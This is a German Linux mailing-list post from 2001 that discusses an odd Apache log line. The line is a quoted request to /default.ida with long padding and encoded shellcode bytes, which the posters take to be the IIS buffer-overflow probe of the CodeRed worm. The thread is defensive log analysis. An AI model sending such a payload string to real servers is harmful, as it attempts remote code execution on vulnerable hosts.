linux-l: Apache-Log - - - sonderbar

Dr. Bernd Freistedt bf at obelix.bfrei.net
Do Aug 2 21:37:40 CEST 2001


---Anselm Hinderling (linux-l at mlists.in-berlin.de) wrote on Thu, 2 Aug 2001 20:30:41 +0200

>> 211.234.52.36 - - [02/Aug/2001:19:00:15 +0200] "GET
>> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u780
>> 1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u81
>> 90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
>> HTTP/1.0" 400 322 "-" "-"

> hamm wir hier auch seit einiger zeit. scheint ein problem
> für IIS darstellen zu sollen, vgl.
> 
> http://www.astalavista.com/exploits/iis/buffer2.shtml

Das ist eine gute Darstellung.

Nun frage ich mich, ob der Versuch dieses remote buffer overflow
eine Routine von CodeRed ist.
Wenn dem so ist, waren es also 46 Versuche der Infektion. Das
bedeutet aber auch, dass nix groeberes passiert, weil bei
erfolgter Infektion alle weiteren unterbleiben.

Gruessli
Bernd

> 
> gruss,
>         anselm.
> 



-- 
Windows is not the answer, it's the question and the answer is NO






Mehr Informationen über die Mailingliste linux-l